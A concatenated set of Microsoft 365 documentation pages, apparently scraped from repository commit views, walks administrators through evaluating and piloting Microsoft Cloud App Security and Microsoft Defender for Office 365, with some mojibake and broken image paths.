+Conditional Access App Control (the ability to apply Conditional Access policies to cloud apps) requires integration with Azure AD. This isn't a requirement for getting started with Cloud App Security. It is a step we encourage you to try out during the pilot phase ΓÇö [Step 3. Pilot Microsoft Cloud App Security](eval-defender-mcas-pilot.md).
+
+## SIEM integration
+
+You can integrate Microsoft Cloud App Security with your generic SIEM server or with Azure Sentinel to enable centralized monitoring of alerts and activities from connected apps.
+
+Additionally, Azure Sentinel includes a Microsoft Cloud App Security connector to provide deeper integration with Azure Sentinel. This enables you to not only gain visibility into your cloud apps but to also get sophisticated analytics to identify and combat cyberthreats and to control how your data travels.
+
+- [Generic SIEM integration](/cloud-app-security/siem)
+- [Stream alerts and Cloud Discovery logs from MCAS into Azure Sentinel](/azure/sentinel/connect-cloud-app-security)
+
+### Next steps
+
+Step 2 of 3: [Enable the evaluation environment for Microsoft Cloud App Security](eval-defender-mcas-enable-eval.md)
+
+Return to the overview for [Evaluate Microsoft Cloud App Security](eval-defender-mcas-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Mcas Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-enable-eval.md
+
+ Title: Enable the evaluation environment for Microsoft Cloud App Security
+description: Learn the architecture of MCAS within Microsoft Defender for Office 365 and understand interactions between the Microsoft 365 Defender products.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable the evaluation environment for Microsoft Cloud App Security
++
+**Applies to:**
+
+- Microsoft 365 Defender
+
+This article is [Step 2 of 2](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Cloud App Security. For more information about this process, see the [overview article](eval-defender-mcas-overview.md).
+
+This article walks you through the process of accessing the Cloud App Security portal and configuring the necessary integration to collect cloud app traffic data.
+
+To discover cloud apps used in your environment, you can do one or both of the following:
+
+- Get up and running quickly with Cloud Discovery by integrating with Microsoft Defender for Endpoint. This native integration enables you to immediately start collecting data on cloud traffic across your Windows 10 devices, on and off your network.
+- To discover all cloud apps accessed by all devices connected to your network, deploy the Cloud App Security log collector on your firewalls and other proxies. This collects data from your endpoints and sends it to Cloud App Security for analysis. Cloud App Security natively integrates with some third-party proxies for even more capabilities.
+
+This article includes guidance for both methods.
+
+Use the following steps to set up Microsoft Cloud App Security.
+
+![Steps to enable Microsoft Microsoft Cloud App Security in the Microsoft Defender evaluation environment](../../media/defender/m365-defender-mcas-eval-enable-steps.png)
+
+- [Step 1. Connect to the Cloud App Security portal](#step-1-connect-to-the-cloud-app-security-portal)
+- [Step 2. Integrate with Microsoft Defender for Endpoint](#step-2-integrate-with-microsoft-defender-for-endpoint)
+- [Step 3. Deploy the Cloud App Security log collector on your firewalls and other proxies](#step-3-deploy-the-cloud-app-security-log-collector-on-your-firewalls-and-other-proxies)
+- [Step 4. View the Cloud Discovery dashboard to see what apps are being used in your organization](#step-4-view-the-cloud-discovery-dashboard-to-see-what-apps-are-being-used-in-your-organization)
+
+## Step 1. Connect to the Cloud App Security portal
+
+To verify licensing and to connect to the Cloud App Security portal, see [Quickstart: Get started with Microsoft Cloud App Security](/cloud-app-security/getting-started-with-cloud-app-security).
+
+If you're not immediately able to connect to the portal, you might need to add the IP address to the allow list of your firewall. See [Basic setup for Cloud App Security](/cloud-app-security/general-setup).
+
+If you're still having trouble, review [Network requirements](/cloud-app-security/network-requirements).
+
+## Step 2. Integrate with Microsoft Defender for Endpoint
+
+Microsoft Cloud App Security integrates with Microsoft Defender for Endpoint natively. The integration simplifies roll out of Cloud Discovery, extends Cloud Discovery capabilities beyond your corporate network, and enables device-based investigation. This integration reveals cloud apps and services being accessed from IT-managed Windows 10 devices.
+
+If you've already set up Microsoft Defender for Endpoint, configuring integration with Cloud App Security is a toggle in Microsoft 365 Defender. After integration is turned on, you can return to the Cloud App Security portal and view rich data in the Cloud Discovery Dashboard.
+
+To accomplish these tasks, see [Microsoft Defender for Endpoint integration with Microsoft Cloud App Security](/cloud-app-security/mde-integration).
+
+## Step 3. Deploy the Cloud App Security log collector on your firewalls and other proxies
+
+For coverage on all devices connected to your network, deploy the Cloud App Security log collector on your firewalls and other proxies to collect data from your endpoints and send it to Cloud App Security for analysis.
+
+If you're using one of the following Secure Web Gateways (SWG), Cloud App Security provides seamless deployment and integration:
+- Zscaler
+- iboss
+- Corrata
+- Menlo Security
+
+For more information on integrating with these network devices, see [Set up Cloud Discovery](/cloud-app-security/set-up-cloud-discovery).
+## Step 4. View the Cloud Discovery dashboard to see what apps are being used in your organization
+
+The Cloud Discovery dashboard is designed to give you more insight into how cloud apps are being used in your organization. It provides an at-a-glance overview of what kinds of apps are being used, your open alerts, and the risk levels of apps in your organization.
+
+To get started using the Cloud Discovery dashboard, see [Working with discovered apps](/cloud-app-security/discovered-apps).
+
+## Next steps
+
+Step 3 of 3: [Pilot Microsoft Cloud App Security](eval-defender-mcas-pilot.md)
+
+Return to the overview for [Evaluate Microsoft Cloud App Security](eval-defender-mcas-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Mcas Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-overview.md
+
+ Title: Evaluate Microsoft Cloud App Security overview, setup or set up an evaluation of device, identity, data, and app protection, as part of Microsoft 365 Defender
+description: Steps to set up your Microsoft 365 Defender trial lab or pilot environment to try out and experience the security solution designed to protect devices, identity, data, and applications in your organization.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate Microsoft Cloud App Security
+
+**Applies to:**
+- Microsoft 365 Defender
++
+This article outlines the process to enable and pilot Microsoft Cloud App Security alongside Microsoft 365 Defender. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+<br>
+
+Use the following steps to enable and pilot Microsoft cloud app security.
+
+![Steps for adding Microsoft Defender for Office to the Defender evaluation environment](../../media/defender/m365-defender-office-eval-steps.png)
+++
+|Step |Description |
+|||
+|[Review architecture requirements and key concepts](eval-defender-mcas-architecture.md) | Understand the Cloud App Security architecture and how it integrates with Microsoft 365 Defender, Microsoft Defender for Endpoint, and Azure Active Directory. |
+|[Enable the evaluation environment](eval-defender-mcas-enable-eval.md) | Connect to the portal, configure integration with Defender for Identity and/or your organization's network devices, and begin to view and manage cloud apps. |
+|[Set up the pilot ](eval-defender-mcas-pilot.md) | Scope your deployment to certain user groups, configure Conditional Access App Control, and try out tutorials for protecting your environment. |
+++
security Eval Defender Mcas Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-pilot.md
+
+ Title: Pilot Microsoft Cloud App Security with Microsoft 365 Defender, create pilot groups, configure conditional access control, try out capabilities, setup as part of Microsoft 365 Defender
+description: Set up your Microsoft 365 Defender trial lab or pilot environment to test and experience the security solution designed to protect devices, identity, data, and applications.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot Microsoft Cloud App Security with Microsoft 365 Defender
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 3 of 3](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Cloud App Security. For more information about this process, see the [overview article](eval-defender-mcas-overview.md).
+
+Use the following steps to setup and configure the pilot for Microsoft Cloud App Security.
++
+![Steps for piloting Microsoft Cloud App Security](../../media/defender/m365-defender-mcas-pilot-steps.png)
+
+- Step 1. [Create the pilot group ΓÇö Scope your pilot deployment to certain user groups](#step-1-create-the-pilot-group--scope-your-pilot-deployment-to-certain-user-groups)
+- [Step 2. Configure protection ΓÇö Conditional Access App Control](#step-2-configure-protection--conditional-access-app-control)
+- [Step 3. Try out capabilities ΓÇö Walk through tutorials for protecting your environment](#step-3-try-out-capabilities--walk-through-tutorials-for-protecting-your-environment)
++
+## Step 1. Create the pilot group ΓÇö Scope your pilot deployment to certain user groups
+
+Microsoft Cloud App Security enables you to scope your deployment. Scoping allows you to select certain user groups to be monitored for apps or excluded from monitoring. You can include or exclude user groups. To scope your pilot deployment, see [Scoped Deployment](/cloud-app-security/scoped-deployment).
++
+## Step 2. Configure protection ΓÇö Conditional Access App Control
+
+One of the most powerful protections you can configure is Conditional Access App Control. This requires integration with Azure Active Directory (Azure AD). It allows you to apply Conditional Access policies, including related policies (like requiring healthy devices), to cloud apps you've sanctioned.
+
+The first step in using Microsoft Cloud App Security to manage SaaS apps is to discover these and then add them to your Azure AD tenant. If you need help with discovery, see [Discover and manage SaaS apps in your network](/cloud-app-security/tutorial-shadow-it). After you've discovered apps, [add these to your Azure AD tenant](/azure/active-directory/manage-apps/add-application-portal).
+
+You can begin to manage these by doing the following:
+
+- First, in Azure AD, create a new conditional access policy and configure it to "Use Conditional Access App Control." This redirects the request to Cloud App Security. You can create one policy and add all SaaS apps to this policy.
+- Next, in Cloud App Security, create session policies. Create one policy for each control you want to apply.
+
+For more information, including supported apps and clients, see [Protect apps with Microsoft Cloud App Security Conditional Access App Control](/cloud-app-security/proxy-intro-aad).
+
+For example policies, see [Recommended Microsoft Cloud App Security policies for SaaS apps](../office-365-security/mcas-saas-access-policies.md). These policies build on a set of [common identity and device access policies](../office-365-security/microsoft-365-policies-configurations.md) that are recommended as a starting point for all customers.
+
+## Step 3. Try out capabilities ΓÇö Walk through tutorials for protecting your environment
+
+The Microsoft Cloud App Security documentation includes a series of tutorials to help you discover risk and protect your environment.
+
+Try out Cloud App Security tutorials:
+
+- [Detect suspicious user activity](/cloud-app-security/tutorial-suspicious-activity)
+- [Investigate risky users](/cloud-app-security/tutorial-ueba)
+- [Investigate risky OAuth apps](/cloud-app-security/investigate-risky-oauth)
+- [Discover and protect sensitive information](/cloud-app-security/tutorial-dlp)
+- [Protect any app in your organization in real time](/cloud-app-security/tutorial-proxy)
+- [Block downloads of sensitive information](/cloud-app-security/use-case-proxy-block-session-aad)
+- [Protect your files with admin quarantine](/cloud-app-security/use-case-admin-quarantine)
+- [Require step-up authentication upon risky action](/cloud-app-security/tutorial-step-up-authentication)
+
+## Next steps
+
+[Investigate and respond using Microsoft 365 Defender in a pilot environment](eval-defender-investigate-respond.md)
+
+Return to the overview for [Evaluate Microsoft Cloud App Security](eval-defender-mcas-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Office 365 Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-architecture.md
+
+ Title: Review architecture requirements and planning concepts for Microsoft Defender for Office 365, construction, building, and design frameworks
+description: The technical diagram for Microsoft Defender for Office 365 in Microsoft 365 Defender will help you understand identity in Microsoft 365 before you build your trial lab or pilot environment.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/01/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Review Microsoft Defender for Office 365 architecture requirements and key concepts
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 1 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
+
+Before enabling Defender for Office 365, be sure you understand the architecture and can meet the requirements. This article describes the architecture, key concepts, and the prerequisites that your Exchange Online environment must meet.
+
+## Understand the architecture
+
+The following diagram illustrates baseline architecture for Microsoft Defender for Office which can include a third-party SMTP gateway or on-premises integration. Hybrid coexistence scenarios (i.e. production mailboxes are both on-premise and online) require more complex configurations and are not covered in this article or evaluation guidance.
+
+![Architecture for Microsoft Defender for Office 365](../../media/defender/m365-defender-office-architecture.png)
+
+The following table describes this illustration.
+
+|Call-out |Description |
+|||
+|1 | The host server for the external sender typically performs a public DNS lookup for an MX record which provides the target server to relay the message. This referral can either be Exchange Online (EXO) directly or an SMTP gateway that has been configured to relay against EXO. |
+|2 | Exchange Online Protection negotiates and validates the inbound connection and inspects the message headers and content to determine what additional policies, tagging, or processing is required. |
+|3 | Exchange Online integrates with Microsoft Defender for Office 365 to offer more advanced threat protection, mitigation, and remediation. |
+|4 | A message that is not malicious, blocked, or quarantined is processed and delivered to the recipient in EXO where user preferences related to junk mail, mailbox rules, or other settings are evaluated and triggered. |
+|5 | Integration with on-premises Active Directory can be enabled using Azure AD Connect to synchronize and provision mail-enabled objects and accounts to Azure Active Directory and ultimately Exchange Online. |
+|6 | When integrating an on-premises environment, it is strongly encouraged to use an Exchange server for supported management and administration of mail related attributes, settings, and configurations |
+|7 | Microsoft Defender for Office 365 shares signals to Microsoft 365 Defender for extended detection and response (XDR).|
+
+On-premises integration is common but optional. If your environment is cloud-only this guidance will also work for you.
+
+## Understand key concepts
+
+The following table identified key concepts that are important to understand when evaluating, configuring, and deploying MDO.
++
+|Concept |Description |More information |
+||||
+|Exchange Online Protection | Exchange Online Protection (EOP) is the cloud-based filtering service that helps protect your organization against spam and malware emails. EOP is included in all Microsoft 365 licenses which include Exchange Online. | [Exchange Online Protection overview](../office-365-security/exchange-online-protection-overview.md) |
+|Anti-malware protection | Organizations with mailboxes in EXO are automatically protected against malware. | [Anti-malware protection in EOP](../office-365-security/anti-malware-protection.md) |
+|Anti-spam protection | Organizations with mailboxes in EXO are automatically protected against junk mail and spam policies. | [Anti-spam protection in EOP](../office-365-security/anti-spam-protection.md) |
+|Anti-phishing protection | MDO offers more advanced anti-phishing protection related to spear phishing, whaling, ransomware, and other malicious activities. | [Additional anti-phishing protection in Microsoft Defender for Office 365](../office-365-security/anti-phishing-protection.md) |
+|Anti-spoofing protection | EOP includes features to help protect your organization from spoofed (forged) senders. | [Anti-spoofing protection in EOP](../office-365-security/anti-spoofing-protection.md) |
+|Safe attachments | Safe Attachments provides an additional layer of protection by using a virtual environment to check and "detonate" attachments in email messages before they are delivered. | [Safe Attachments in Microsoft Defender for Office 365](../office-365-security/safe-attachments.md) |
+|Safe attachments for SharePoint, OneDrive, and Microsoft Teams | In addition, Safe Attachments for SharePoint, OneDrive, and Microsoft Teams offers an additional layer of protection for files that have been uploaded to cloud storage repositories. | [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](../office-365-security/mdo-for-spo-odb-and-teams.md) |
+|Safe Links | Safe Links is a feature that provides URL scanning and rewriting within inbound email messages and offers verification of those links before they are delivered or clicked. | [Safe Links in Microsoft Defender for Office 365](../office-365-security/safe-links.md) |
+| | | |
+
+For more detailed information about the capabilities included with Microsoft Defender for Office, see [Microsoft Defender for Office 365 service description](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description).
+
+## Review architecture requirements
+A successful MDO evaluation or production pilot assumes the following pre-requisites:
+- All your recipient mailboxes are currently in Exchange Online.
+- Your public MX record resolves directly to EOP or a third-party SMTP gateway that then relays inbound external email directly to EOP.
+- Your primary email domain is configured as *authoritative* in Exchange Online.
+- You successfully deployed and configured *Directory Based Edge Blocking* (DBEB) as appropriate. For more information, see [Use Directory Based Edge Blocking to reject messages sent to invalid recipients](/exchange/mail-flow-best-practices/use-directory-based-edge-blocking).
+
+> [!IMPORTANT]
+> If these requirements are not applicable or you are still in a hybrid coexistence scenario, then a Microsoft Defender for Office 365 evaluation can require more complex or advanced configurations which are not fully covered in this guidance.
+
+## SIEM integration
+
+You can integrate Microsoft Defender for Office 365 with Azure Sentinel to more comprehensively analyze security events across your organization and build playbooks for effective and immediate response. For more information, see [Connect alerts from Microsoft Defender for Office 365](/azure/sentinel/connect-office-365-advanced-threat-protection).
+
+Microsoft Defender for Office 365 can also be integrated into other Security Information and Event Management (SIEM) solutions using the [Office 365 Activity Management API](/office/office-365-management-api/office-365-management-activity-api-reference).
+
+## Next steps
+
+Step 2 of 3: [Enable the evaluation environment Microsoft Defender for Office 365](eval-defender-office-365-enable-eval.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
+
security Eval Defender Office 365 Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-enable-eval.md
+
+ Title: Enable the evaluation environment for Microsoft Defender for Office 365 in your production environment, activate your evaluation, activation
+description: Steps to activate Microsoft Defender for Office365 evaluation, with trial licenses, MX record handling, & auditing of accepted domains and inbound connections.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/01/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable the evaluation environment
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 2 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
+
+Use the following steps to enable the evaluation for Microsoft Defender for Office 365.
++
+![Steps to enable Microsoft Defender for Office 365 in the Microsoft Defender evaluation environment](../../media/defender/m365-defender-office-eval-enable-steps.png)
+
+- [Step 1: Activate trial licenses](#step-1-activate-trial-licenses)
+- [Step 2: Audit and verify the public MX record](#step-2-audit-and-verify-the-public-mx-record)
+- [Step 3: Audit accepted domains](#step-3-audit-accepted-domains)
+- [Step 4: Audit inbound connectors](#step-4-audit-inbound-connectors)
+- [Step 5: Activate the evaluation](#step-5-activate-the-evaluation)
+
+## Step 1: Activate trial licenses
+
+Log on to your existing Microsoft Defender for Office 365 environment or tenant administration portal.
+
+1. Navigate to the administration portal.
+2. Select Purchase Services from the quick launch.
++
+3. Scroll down to the Add-On section (or search for "Defender") to locate the Microsoft Defender for Office 365 plans.
+4. Click Details next the plan you want to evaluate.
++
+5. Click the *Start free trial* link.
++
+6. Confirm your request and click the *Try now* button.
++
+## Step 2: Audit and verify the public MX record
+
+To effectively evaluate Microsoft Defender for Office 365, it's important that inbound external email be relayed through the Exchange Online Protection (EOP) instance associated with your tenant.
+
+1. Log on to the M365 Admin Portal, expand Settings, and select Domains.
+2. Select your verified email domain and click Manage DNS.
+3. Make note of the MX record generated and assigned to your EOP tenant.
+4. Access your external (public) DNS zone and check the primary MX record associated with your email domain.
+ - *If your public MX record currently matches the assigned EOP address (e.g. tenant-com.mail.protection.outlook.com) then no further routing changes should be required*.
+ - If your public MX record currently resolves to a third-party or on-premises SMTP gateway then additional routing configurations may be required.
+ - If your public MX record currently resolves to on-premises Exchange then you may still be in a hybrid model where some recipient mailbox have not yet been migrated to EXO.
+
+## Step 3: Audit accepted domains
+
+1. Log on the Exchange Online Admin Portal, select Mail Flow, and then click Accepted Domains.
+2. From the list of accepted domains that have been added and verified in your tenant, make note of the **domain type** for your primary email domain.
+ - If the domain type is set to ***Authoritative*** then it is assumed all recipient mailboxes for your organization currently reside in Exchange Online.
+ - If the domain type is set to ***Internal Relay*** then you may still be in a hybrid model where some recipient mailboxes still reside on-premises.
+
+## Step 4: Audit inbound connectors
+
+1. Log on the Exchange Online Admin Portal, select Mail Flow, and then click Connectors.
+2. From the list of configured connectors, make note of any entries which are from **Partner Organization** and may correlate to a third-party SMTP gateway.
+3. From the list of configured connectors, make note of any entries labeled **From your organization's email server** which may indicate that you are still in hybrid scenario.
+
+## Step 5: Activate the evaluation
+
+Use the instructions here to activate your Microsoft Defender for Office 365 evaluation from the Microsoft 365 Defender portal.
+
+1. Log on to your tenant with an account that has access to the Microsoft 365 Defender portal.
+2. Choose whether you want to make the **Microsoft 365 Defender portal** your default interface for Microsoft Defender for Office 365 administration (recommended).
++
+3. From the navigation menu, select **Policies & Rules** under *Email & Collaboration*.
++
+4. On the *Policy & Rules* dashboard, click **Threat Policies**.
++
+5. Scroll down to *Additional Policies* and select the **Evaluate Defender for Office 365** tile.
++
+6. Now choose whether external email routes to Exchange Online directly, or to a third-party gateway or service, and click Next.
++
+7. If you use a third-party gateway, select the vendor name from the drop-down along with the inbound connector associated with that solution. When you've listed your answers, click Next.
++
+8. Review your settings and click the **Create Evaluation** button.
+
+| | |
+|||
+| :::image type="content" source="../../medio-eval-activate-complete.png" alt-text="And now the set up is complete. The blue button on this page says 'Go to Evaluation'."::: |
+
+## Next steps
+
+Step 3 of 3: Set up the pilot for Microsoft Defender for Office 365
+
+Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Office 365 Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-overview.md
+
+ Title: Evaluate Microsoft Defender for Office 365 overview, how to evaluate, evaluation steps
+description: Use this overview to learn the steps to set up an MDO pilot, including requirements, enabling or activating the eval, and setting up the pilot.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable and pilot Microsoft Defender for Office 365
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article outlines the process to enable and pilot Microsoft Defender for Office 365. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+<br>
+
+Use the following steps to enable and pilot Microsoft Defender for Office 365.
+
+![Steps for adding Microsoft Defender for Office to the Defender evaluation environment](../../media/defender/m365-defender-office-eval-steps.png)
+
+The following table describes the steps in the illustration.
+
+| |Step |Description |
+||||
+|1|[Review architecture requirements and key concepts](eval-defender-office-365-architecture.md) | Understand the Defender for Office architecture and be sure your Exchange Online environment meets the architecture prerequisites. |
+|2|[Enable the evaluation environment](eval-defender-office-365-enable-eval.md) | Follow the steps to setup the evaluation environment. |
+|3|[Set up the pilot ](eval-defender-office-365-pilot.md) | Create pilot groups, configure protection, and become familiar with key features and dashboards. |
+||||
+
security Eval Defender Office 365 Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-pilot.md
+
+ Title: Pilot Microsoft Defender for Office 365, use the evaluation in your production environment, promote the evaluation to live in production, learn how to evaluate Defender
+description: Steps to pilot your Evaluation with groups of active and existing users in order to properly test the features of Microsoft Defender for Office 365.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 05/25/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot Microsoft Defender for Office 365
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 3 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
+
+Use the following steps to setup and configure the pilot for Microsoft Defender for Office 365.
+
+![Steps for creating the pilot for Microsoft Defender for Office 365](../../media/defender/m365-defender-office-pilot.png)
+
+- [Step 1: Create pilot groups](#step-1-create-pilot-groups)
+- [Step 2: Configure protection](#step-2-configure-protection)
+- [Step 3: Try out capabilities ΓÇö Get familiar with simulation, monitoring, and metrics](#step-3-try-out-capabilities--get-familiar-with-simulation-monitoring-and-metrics)
+
+When you evaluate Microsoft Defender for Office 365, you may choose to pilot specific users before enabling and enforcing policies for your entire organization. Creating distribution groups can help manage the deployment processes. For example, create groups such as *Defender for Office 365 Users - Standard Protection*, *Defender for Office 365 Users - Strict Protection*, *Defender for Office 365 Users - Custom Protection*, or *Defender for Office 365 Users - Exceptions*.
+
+It may not be evident why 'Standard' and 'Strict' are the terms used for this, but that will become clear when you explore more about Defender for Office 365 security presets. Naming groups 'custom' and 'exceptions' speak for themselves, and though most of your users should fall under *standard* and *strict*, custom and exception groups will collect valuable data for you regarding managing risk.
+
+## Step 1: Create pilot groups
+
+Distribution groups can be created and defined directly in Exchange Online or synchronized from on-premises Active Directory.
+
+1. Logon to Exchange Admin Center (EAC) using an account that has been granted Recipient Administrator role or been delegated group management permissions.
+2. From the navigation menu, expand *Recipients* and select *Groups*.
++
+3. From the Groups dashboard, select "Add a group".
++
+4. For group type, select *Distribution* and click Next.
++
+5. Give the group a name and description and then click Next.
++
+## Step 2: Configure protection
+
+Some capabilities in Defender for Office 365 are configured and turned on by default, but security operations may want to raise the level of protection from the default.
+
+Some capabilities are *not yet* configured. You have three options for configuring protection:
+
+- **Assign preset security policies automatically** ΓÇö [Preset security policies](../office-365-security/preset-security-policies.md) are provided as a method to quickly assign a uniform level of protection across all of the capabilities. You can choose from ***standard*** or ***strict***. A good approach is to start with preset security policies and then fine-tune the policies as you learn more about the capabilities and your own unique threat environment. The advantage here is that you protect groups of users as quickly as possible, with the ability to tweak protection afterward. (This method is recommended.)
+- **Configure baseline protection manually** ΓÇö If you prefer to configure the environment yourself, you can quickly achieve a *baseline* of protection by following the guidance in [Protect against threats](../office-365-security/protect-against-threats.md). With this approach you get to learn more about the settings that are configurable. And, of course, you can fine-tune the policies later.
+- **Configure *custom* protection policies** ΓÇö You can also build and assign custom protection policies as part of your evaluation. Before you start customizing policies, it's important to understand the precedence in which these protection policies are applied and enforced. Security ops will need to create some policies even if when the preset is applied, in specific in order to define security policies for Safe Links and Safe Attachments.
+
+> [!IMPORTANT]
+> **If you need to configure custom protection policies**, you should examine the values that make up the **Standard** and **Strict** security definitions here: *[Recommended settings for EOP and Microsoft Defender for Office 365 security](../office-365-security/recommended-settings-for-eop-and-office365.md)*. Default values, as seen before any configuration takes place are also listed. Keep a spreadsheet of where your custom build deviates.
+
+### Assign preset security policies
+
+It's encouraged to begin with the *recommended baseline policies* when evaluating MDO and then refine them as needed over the course of your evaluation period.
+
+You can enable recommended EOP and Defender for Office 365 protection policies fast, and assign them to specific pilot users or defined groups as part of your evaluation. Preset policies offer a baseline **Standard** protection template or a more aggressive **Strict** protection template which can be assigned independently, or combined.
+
+Here is the [Preset security policies in EOP and Microsoft Defender for Office 365](../office-365-security/preset-security-policies.md) article outlining the steps.
+
+1. Log on to your Microsoft 365 tenant. Use an account with access to the Microsoft 365 Defender portal, added to Organization Management role in Office 365, or Security Administrator role in Microsoft 365.
+2. From the navigation menu, select *Polices & Rules* under Email & Collaboration.
++
+3. On the Policy & Rules dashboard, click *Threat Policies*.
++
+4. From the Microsoft 365 Defender portal, expand Threat Management from the navigation menu and then select Policy from the submenu.
+5. On the Policy dashboard, click *Preset security policies*.
++
+6. Click *Edit* to configure and assign the Standard policy and/or Strict policy. :::image type="content" source="../../medio-eval-pilot-preset.png" alt-text="On the Preset security policies panel, click Edit.":::
+7. Add conditions to apply baseline ***EOP*** protections to specific pilot users, or groups of users, as needed, and select *Next* to continue.
+ - Example, a Defender for Office 365 condition for pilot evaluations could be applied if the recipients are *members* of a defined *Defender for Office 365 Standard Protection* group, and then managed by simply adding accounts to, or removing account from, the group.
+ :::image type="content" source="../../medio-eval-pilot-eop-protections.png" alt-text="Add the conditions needed to apply the EOP security level to your pilot group.":::
+
+8. Add conditions to apply baseline ***MDO*** protections to specific pilot users, or groups of users, as needed. Click *Next* to continue.
+ - For example, a Defender for Office 365 condition for pilot evaluations could be applied if the recipients are *members* of a defined *Defender for Office 365 Standard Protection* group and then managed by simply adding / removing accounts via the group.
+ :::image type="content" source="../../medio-protections.png" alt-text="Add the conditions needed to apply the Defender for Office 365 security level to your pilot group.":::
+
+9. Review and confirm your changes for assigning preset security policies.
+10. Preset protection policies can be managed (re-configured, re-applied, disabled, etc.) by returning to the Microsoft 365 Defender portal > Policies & rules > Threat Policies > and clicking the *Preset security policies* tile.
+
+### Configure custom protection policies
+
+The pre-defined *Standard* or *Strict* Defender for Office 365 policy templates give your pilot users the recommended baseline protection. However, you can also build and assign custom protection policies as part of your evaluation.
+
